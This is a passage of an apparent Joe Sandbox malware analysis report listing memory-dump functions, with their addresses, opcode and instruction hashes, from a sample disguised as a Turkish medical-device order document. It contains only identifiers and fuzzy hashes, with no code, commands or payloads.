                                                                                                    • Opcode Fuzzy Hash: f9fd859ae8cbf3e552571c0e0afa5af3600ef999a02c0021c3e175ca63be2523
                                                                                                    • Instruction Fuzzy Hash: 70319F75304205DFD714DFA9E880BAAB7E6FBC9220F15847AE909CB365DB30EC018B60
                                                                                                    Function 07429240 Relevance: .1, Instructions: 88COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7ac38690f5a1743399bed148691213891cda42ca9ea9d26b413e9a6722514582
                                                                                                    • Instruction ID: af0a211276d81d1066592fba24faec21eb7c37d3a1656983db15773c8029d86d
                                                                                                    • Opcode Fuzzy Hash: 7ac38690f5a1743399bed148691213891cda42ca9ea9d26b413e9a6722514582
                                                                                                    • Instruction Fuzzy Hash: B02105B67002114FEB258B65C8915FF77E2EB84220F69846AD586E3395C638F882D761
                                                                                                    Function 075C6568 Relevance: .1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fc1b9d6e5fd2d60f0acf8e3f04f6134375a5ec59c77ad1f291cf567fc698a973
                                                                                                    • Instruction ID: 797ed8b843c253d0fa31cb5762723ce23354a4df9af4bf8cdde88833e6d06eb8
                                                                                                    • Opcode Fuzzy Hash: fc1b9d6e5fd2d60f0acf8e3f04f6134375a5ec59c77ad1f291cf567fc698a973
                                                                                                    • Instruction Fuzzy Hash: F731E8B4E1024ADFCB04DFE8D8916EEBBF5FB49310F10456AD605E7250EB749A458BA0
                                                                                                    Function 07427D50 Relevance: .1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 702e1ebfdfa156761b1d39b57c1be80cc9ab6764e19601a31236a01b3d190b15
                                                                                                    • Instruction ID: 8d8212c9223cddc2e675469e80bb7dbed0f324bdab38fe9524319f2765531362
                                                                                                    • Opcode Fuzzy Hash: 702e1ebfdfa156761b1d39b57c1be80cc9ab6764e19601a31236a01b3d190b15
                                                                                                    • Instruction Fuzzy Hash: 94319EB5720221CFC714DB28C458AA977E2FF8A710F5544AAE516DB372CB349C03DB90
                                                                                                    Function 075CC46A Relevance: .1, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 37988dcbecb8bf0f54ac1355581d14dd717d6e1229d8a75cf5b5a16c1c061f7c
                                                                                                    • Instruction ID: 205d9542bf2f60fe51489a03f4a433e643b819038b8c1488fe0922a65b23e224
                                                                                                    • Opcode Fuzzy Hash: 37988dcbecb8bf0f54ac1355581d14dd717d6e1229d8a75cf5b5a16c1c061f7c
                                                                                                    • Instruction Fuzzy Hash: 672141F0E38515CFD754CAE9D4807F9B7B5BB4A311F01896FA20ECA250C675D5808BB6
                                                                                                    Function 0742AB00 Relevance: .1, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f40c0cd890656453a809f9ba3f78da97a01dc0fffdc53945b1691a0285cb1a79
                                                                                                    • Instruction ID: f3001cfdbace198d99bf98caaca06c40bb4b82fc3dd1d6c8ea8b4fea7fd2826b
                                                                                                    • Opcode Fuzzy Hash: f40c0cd890656453a809f9ba3f78da97a01dc0fffdc53945b1691a0285cb1a79
                                                                                                    • Instruction Fuzzy Hash: 37314B71B011298FCB10DFA9C854AEDBBF2BF88310F65446AD905FB361CB759902DB90
                                                                                                    Function 07429728 Relevance: .1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b7b4227455e42d9091cecb2f362cfb262bc5111a5417dd1a463b37bd928ca0e3
                                                                                                    • Instruction ID: 28ab0ecf9303e173e14439d6478d1ff119b95c30ca477019cac1381aff92c153
                                                                                                    • Opcode Fuzzy Hash: b7b4227455e42d9091cecb2f362cfb262bc5111a5417dd1a463b37bd928ca0e3
                                                                                                    • Instruction Fuzzy Hash: F121D1F0F10226D6CB11BA64C4441EABB71EF46210F92896BCC46A7244FA359937AA91
                                                                                                    Function 075CC1A1 Relevance: .1, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 763853088e38236507f2dc886b2dd4bfc8a058b0782b21506bc06ccf619cfcd6
                                                                                                    • Instruction ID: 2fa4fec9d36aa3e2de8d42db7ca69273881f48f3731065ee0819e6043902278b
                                                                                                    • Opcode Fuzzy Hash: 763853088e38236507f2dc886b2dd4bfc8a058b0782b21506bc06ccf619cfcd6
                                                                                                    • Instruction Fuzzy Hash: 13219CF0A28295CFC710CAED88903F9B7B0FB47350F1489AFD5AEC6245C266C95587B2
                                                                                                    Function 075C6C11 Relevance: .1, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f3170c66e1d7cb46586d3a596b11d42ee35808e0d49e6465d8aab8e9e9a463b9
                                                                                                    • Instruction ID: af473b417846ddabe65e0a767289e643163b2ee0194c0c0a3e84442b2afbf079
                                                                                                    • Opcode Fuzzy Hash: f3170c66e1d7cb46586d3a596b11d42ee35808e0d49e6465d8aab8e9e9a463b9
                                                                                                    • Instruction Fuzzy Hash: B131DFB0614148CFC704DBD8D4957EABBB1FB8A318F54882ED1169B381CB7ADE468B80
                                                                                                    Function 074211A7 Relevance: .1, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 11fa0474b3a80b2f6df2d392d9f6518441498736343ddf4c82e72388da6323d6
                                                                                                    • Instruction ID: dd21f22aa68f0c1135a8fdfddd61af2f603877b0a22019905d3c8110a3be9590
                                                                                                    • Opcode Fuzzy Hash: 11fa0474b3a80b2f6df2d392d9f6518441498736343ddf4c82e72388da6323d6
                                                                                                    • Instruction Fuzzy Hash: 18318EB4E0014EDFCF11EFA8D5406EEBBF0EB4A340B1042AAD425AB351DB719A12DF91
                                                                                                    Function 07429250 Relevance: .1, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0cf9cce26ed6903d288d940286e1eb266cabfa16d0bc5b4edc10e96541e04220
                                                                                                    • Instruction ID: ccf5dcb0c5b41c90b145a552f6de6d61cd0cb88bf84b7b0f85352b6fc8896b13
                                                                                                    • Opcode Fuzzy Hash: 0cf9cce26ed6903d288d940286e1eb266cabfa16d0bc5b4edc10e96541e04220
                                                                                                    • Instruction Fuzzy Hash: 922126B67006214FEB24CB69C8815BF77E6EBC4220F68842AD546A3394CA34FD81D761
                                                                                                    Function 075C6559 Relevance: .1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f8d56005e3ad50a442b2d7576d73b0a345b4f76ddd5b68910bfff54aa0600ca1
                                                                                                    • Instruction ID: ea0eb3d0abbe74909d0a97b068fd73cc5d0ceccd2a6fbb1c226af5410476d5f4
                                                                                                    • Opcode Fuzzy Hash: f8d56005e3ad50a442b2d7576d73b0a345b4f76ddd5b68910bfff54aa0600ca1
                                                                                                    • Instruction Fuzzy Hash: 073146B0E1024ADFCB00DFE8C8916EEBBF1FF49310F10456AE505E7240EB749A858BA1
                                                                                                    Function 075C0FC0 Relevance: .1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94f4065fd9127cd9ac81d1eeebdcdca923d1435aa0ba7870e4a404bc45ca9389
                                                                                                    • Instruction ID: afa3b1101bf5da20e94e44f696fc3803335452be46ed60d89e87e7629676404f
                                                                                                    • Opcode Fuzzy Hash: 94f4065fd9127cd9ac81d1eeebdcdca923d1435aa0ba7870e4a404bc45ca9389
                                                                                                    • Instruction Fuzzy Hash: 98318635A10619CFCB05EFA8C8948DCFBB1FF89300F018299D545AB264FB74A989CB91
                                                                                                    Function 075C29E0 Relevance: .1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 652ffbb66bd60de9cbf5b8c687352b7f0e9600bc1bb364ce19fa5e4ce97c20ca
                                                                                                    • Instruction ID: c439dd1cbae6749b931c7143897f53ef565446ce3224e05413939bfe77cdef2c
                                                                                                    • Opcode Fuzzy Hash: 652ffbb66bd60de9cbf5b8c687352b7f0e9600bc1bb364ce19fa5e4ce97c20ca
                                                                                                    • Instruction Fuzzy Hash: 52219CB470050ACFDB24DBA8EA44BAAB7F5FB8A365F04403AE519C7240DB74D902CB90
                                                                                                    Function 00CAD390 Relevance: .1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2241769406.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_cad000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c2335f833dd1e01028a2f8e8b2a72c281872783bd72ec48864828eb8302f4591
                                                                                                    • Instruction ID: 733699bfd51ddcde86fd75e8400ae81b187774ed736e1763d17f69324be1384a
                                                                                                    • Opcode Fuzzy Hash: c2335f833dd1e01028a2f8e8b2a72c281872783bd72ec48864828eb8302f4591
                                                                                                    • Instruction Fuzzy Hash: A02128B2504201DFDF05DF14D9C0B26BF65FB89318F20C569E90B0B656C336E856CB62
                                                                                                    Function 0742E728 Relevance: .1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c91a4d1c515371db43db16bfe9128aeebcd97c56a47fdf88ba239cd390553430
                                                                                                    • Instruction ID: f069f03b9be6e0b3c54c2815015dc2adf5ba7e4c4708ce10d9b891938c2f31b1
                                                                                                    • Opcode Fuzzy Hash: c91a4d1c515371db43db16bfe9128aeebcd97c56a47fdf88ba239cd390553430
                                                                                                    • Instruction Fuzzy Hash: 96216071F00629CFCB01FBB9C4586EEB7B4EF89210F50426AE519E7360EB309956CB91
                                                                                                    Function 0742A338 Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bde77ff9491b70195d481cc0140c932965e831ec147f572710eaa5d73de35e12
                                                                                                    • Instruction ID: 48f5f83a254cfb4d8db3ff69ca35406a1745670f30b5189f81ec4514dbd900de
                                                                                                    • Opcode Fuzzy Hash: bde77ff9491b70195d481cc0140c932965e831ec147f572710eaa5d73de35e12
                                                                                                    • Instruction Fuzzy Hash: 0B219F703043218BC325AA79881496BB7EAAFC5204B98886ECE82CB791DF25DC16D751
                                                                                                    Function 075C0290 Relevance: .1, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aacbdc087d42b6846762f4f1d20ff607ed3483f0a0fb1a241d4edaab1d276bc3
                                                                                                    • Instruction ID: 713933172db7214e2a8a2e6910143aa1ee25840fd6b18e416aae55e6b3061441
                                                                                                    • Opcode Fuzzy Hash: aacbdc087d42b6846762f4f1d20ff607ed3483f0a0fb1a241d4edaab1d276bc3
                                                                                                    • Instruction Fuzzy Hash: CD2162B5B002098FCB44DF79CC849EEBBB5FF89200B50456DD90AE7251EB309905CBA1
                                                                                                    Function 074229B8 Relevance: .1, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 02fd8217cd9e307eea4aa45d42b76992b5350d6946af4997a5723a9649218454
                                                                                                    • Instruction ID: 9b6478ca64831d1b9dc936b1d12afe84f988d68db9f28f75bf24e6fec33cc405
                                                                                                    • Opcode Fuzzy Hash: 02fd8217cd9e307eea4aa45d42b76992b5350d6946af4997a5723a9649218454
                                                                                                    • Instruction Fuzzy Hash: 6E21D430A04248AFE784ABB4DC56BEE7BB6FBC5700F50C466E505DB180DA749E06DB90
                                                                                                    Function 07423468 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 69fd6466408ba089152f2164319626afb24256f01f180fc5e3fc68c25aa61b73
                                                                                                    • Instruction ID: c8a5e408db69497dd1e6e8faae257295000a07b351240bda20b3c3f893d5ea09
                                                                                                    • Opcode Fuzzy Hash: 69fd6466408ba089152f2164319626afb24256f01f180fc5e3fc68c25aa61b73
                                                                                                    • Instruction Fuzzy Hash: F32160B4A00226CFCB10DF68D884B9E7BB1BF49210F1544A6E805DB361D775EC96CB61
                                                                                                    Function 074229C8 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b647ac08fcf680eeb82ee2c024b15ec2ff17bce12be42af2a76cbabbbefdca9d
                                                                                                    • Instruction ID: d69a26f8b8c74c7cc826c95dc4e4a97c02d7960a509ced1e2ce9ec38f4fe054b
                                                                                                    • Opcode Fuzzy Hash: b647ac08fcf680eeb82ee2c024b15ec2ff17bce12be42af2a76cbabbbefdca9d
                                                                                                    • Instruction Fuzzy Hash: 3E21F370A04244AFE784ABB4DC16BFE7B76FFC5700F50C466E505DB280DAB49E069790
                                                                                                    Function 00CBD36C Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2241824311.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_cbd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 34742fdf43354fa8c8136c14634451dda457f13702a5c95531286676bfa96378
                                                                                                    • Instruction ID: 49e96058ba35f7e62781915a3761528e911566636a8235de365fa3efe43bcfcb
                                                                                                    • Opcode Fuzzy Hash: 34742fdf43354fa8c8136c14634451dda457f13702a5c95531286676bfa96378
                                                                                                    • Instruction Fuzzy Hash: 28210475504304EFDB04DF14D5C0B66BBA5FB84314F24C56DE90B4B2A2D77AD846CE62
                                                                                                    Function 00CBD1B4 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2241824311.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_cbd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b608fa56a5a650e75cca8ee766d96f7beb38724d3edd4885beec098d69436439
                                                                                                    • Instruction ID: ad23a721bd3d314df14b465250d9485b14d892fd76bde579c3014ea62abd3b62
                                                                                                    • Opcode Fuzzy Hash: b608fa56a5a650e75cca8ee766d96f7beb38724d3edd4885beec098d69436439
                                                                                                    • Instruction Fuzzy Hash: 2F214675504380EFCB04DF14D5C0B6ABB65FB84324F20C56DE90A0B252D376DC46CB62
                                                                                                    Function 075C02A0 Relevance: .1, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a43c18b58d412a6d77adbbca3a20d631d601fde39223e08cbdf551f486147323
                                                                                                    • Instruction ID: ba7a3e4f28c908c39eceddb9cc5e4126ea7272bb93647e276ca43e8cbe3ff9a9
                                                                                                    • Opcode Fuzzy Hash: a43c18b58d412a6d77adbbca3a20d631d601fde39223e08cbdf551f486147323
                                                                                                    • Instruction Fuzzy Hash: 60213175A0020ACFCF44EF69C8849EEB7B5FF88300B508569D909B7351EB30A945CBA0
                                                                                                    Function 075CC536 Relevance: .1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 733dd435e57561ac144491a74379e8ba3c1eb6587e75a4eeb526a72ab716e6fa
                                                                                                    • Instruction ID: 063518912d7c7922b582c79321074a41e53da07395a31af4d8f586fc820f0fd8
                                                                                                    • Opcode Fuzzy Hash: 733dd435e57561ac144491a74379e8ba3c1eb6587e75a4eeb526a72ab716e6fa
                                                                                                    • Instruction Fuzzy Hash: 74213DF0E38511CFD704C6A8C8807F9B3A1BB4A311F018A5BA31ECA690C675E5908BB6
                                                                                                    Function 075C8E68 Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4b12aa0a651f0ef4545837a13045d7e2f205ecc269c85d09be719be74b210105
                                                                                                    • Instruction ID: e4df81e2fc73c56189c0320fd3e006ad32d026f5fc8494b8aa45db8053f938a2
                                                                                                    • Opcode Fuzzy Hash: 4b12aa0a651f0ef4545837a13045d7e2f205ecc269c85d09be719be74b210105
                                                                                                    • Instruction Fuzzy Hash: 101106B191D294DFC321D6E894103F57BA9BB43215F148CEFD445CA186C63EB842C3A7
                                                                                                    Function 075C3FC8 Relevance: .1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7c2b474abd20251ed622368cc1b29ac5738c2e98e6a5012da437f64693adae44
                                                                                                    • Instruction ID: 210c22fa03f29ef4d383d2bee1e4eae042d12b85bfdbc946d3c53bb869e248f1
                                                                                                    • Opcode Fuzzy Hash: 7c2b474abd20251ed622368cc1b29ac5738c2e98e6a5012da437f64693adae44
                                                                                                    • Instruction Fuzzy Hash: D21106B17083546FC725DBBE985059FBFFA8F86250B0484ABE548C7752DD649C0783E1
                                                                                                    Function 0742C310 Relevance: .1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b66d2dea8c9e593c83d6f5e25e78a45710b2fac7f61d6d826053ae586dd4b9f5
                                                                                                    • Instruction ID: e01201234e62a3f5bc8fea40da80ea0208cec9cc639fc6a6292b3eb5758c766b
                                                                                                    • Opcode Fuzzy Hash: b66d2dea8c9e593c83d6f5e25e78a45710b2fac7f61d6d826053ae586dd4b9f5
                                                                                                    • Instruction Fuzzy Hash: F3217F30904608CFDB15EF68C8556EEBBB1FF89300F50891ED4467B250EB359955DBA2
                                                                                                    Function 0742E330 Relevance: .1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
